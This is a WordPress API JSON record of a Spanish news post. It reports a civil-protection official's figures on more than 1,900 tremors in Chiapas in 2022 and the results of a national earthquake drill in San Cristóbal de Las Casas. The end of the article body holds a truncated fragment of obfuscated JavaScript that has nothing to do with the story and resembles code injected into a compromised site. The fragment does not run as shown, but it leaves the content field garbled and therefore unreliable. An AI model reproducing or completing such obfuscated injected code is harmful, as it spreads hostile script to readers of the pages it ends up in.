{"id":5241,"date":"2022-09-20T02:54:00","date_gmt":"2022-09-20T02:54:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5241"},"modified":"2022-09-20T02:54:01","modified_gmt":"2022-09-20T02:54:01","slug":"ha-temblado-en-casi-dos-mi-ocasiones-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5241","title":{"rendered":"Ha temblado en casi dos mi ocasiones en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-19-at-12.42.12-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-5242\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-19-at-12.42.12-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-19-at-12.42.12-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-19-at-12.42.12-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-19-at-12.42.12-PM-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-19-at-12.42.12-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- V\u00edctor Amezcua V\u00e1zquez, Delegado en la Regi\u00f3n Altos de Protecci\u00f3n Civil dio a conocer que \u201chasta ahora seg\u00fan las estad\u00edsticas hablamos de m\u00e1s de mil 900 movimientos tel\u00faricos en el transcurso del a\u00f1o; quienes vivimos los dos terremotos hemos aprendido con dolor porque sufrimos junto con las personas, nos dedicamos a las emergencias y eso nos permite tener un panorama que la sociedad debe ser m\u00e1s responsable con los planes familiares y en oficinas, eso le ha dado a Chiapas varias condecoraciones en materia de protecci\u00f3n civil\u201d.<\/p>\n\n\n\n<p>Tras el simulacro realizado en San Crist\u00f3bal, revel\u00f3 que se obtuvo una respuesta de un minuto con 17 de segundos para evacuar a 300 personas, fue el resultado del Simulacro Nacional de Sismo en las instalaciones de la Unidad Administrativa de esta ciudad, donde la hip\u00f3tesis fue de 8.1 grados, inform\u00f3 el,.<\/p>\n\n\n\n<p>En entrevista, coment\u00f3 que este simulacro se hace para honrar la memoria de quienes perdieron la vida en los sismos del 19 de septiembre en 1985 y 2017, hechos que han motivado a la sociedad a participar m\u00e1s en temas relacionados con la Protecci\u00f3n Civil y \u201cagradecer a los medios de comunicaci\u00f3n que manejan informaci\u00f3n precisa y concreta lo cual hace que la sociedad no caiga en alarma\u201d.<\/p>\n\n\n\n<p>\u201cEl terremoto de 2017 de 8.2 grados fue un parteaguas para la sociedad y las autoridades, el gobierno del estado, hace un plan espec\u00edfico para cualquier contingencia que se pueda presentar y dentro de ello tenemos la actividad; tenemos una sociedad muy activa, tenemos Comit\u00e9s de Protecci\u00f3n Civil en diferentes partes del estado, son los principales actores, los primeros respondientes\u201d.<\/p>\n\n\n\n<p>Asimismo, dijo que cuentan con el apoyo de Cruz Roja, de la Polic\u00eda Municipal, de la Guardia Nacional y del Ej\u00e9rcito para atender cualquier contingencia, \u201cde manera responsable activamos a las 12 del d\u00eda con 19 minutos las alarmas con una hip\u00f3tesis de 8.1 grados, tenemos reporte de dos movimientos en el transcurso de la ma\u00f1ana de 4.1, 4.5 eso nos mantiene alertas y sobre todo conscientes de la gran responsabilidad de que tenemos como sociedad y autoridades\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- V\u00edctor Amezcua V\u00e1zquez, Delegado en la Regi\u00f3n Altos de Protecci\u00f3n Civil dio a conocer que \u201chasta ahora seg\u00fan las estad\u00edsticas hablamos de m\u00e1s de mil 900 movimientos tel\u00faricos en el transcurso del a\u00f1o; quienes vivimos los dos terremotos hemos aprendido con dolor porque sufrimos junto con las personas, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5242,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5241","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5241","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5241"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5241\/revisions"}],"predecessor-version":[{"id":5243,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5241\/revisions\/5243"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5242"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5241"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}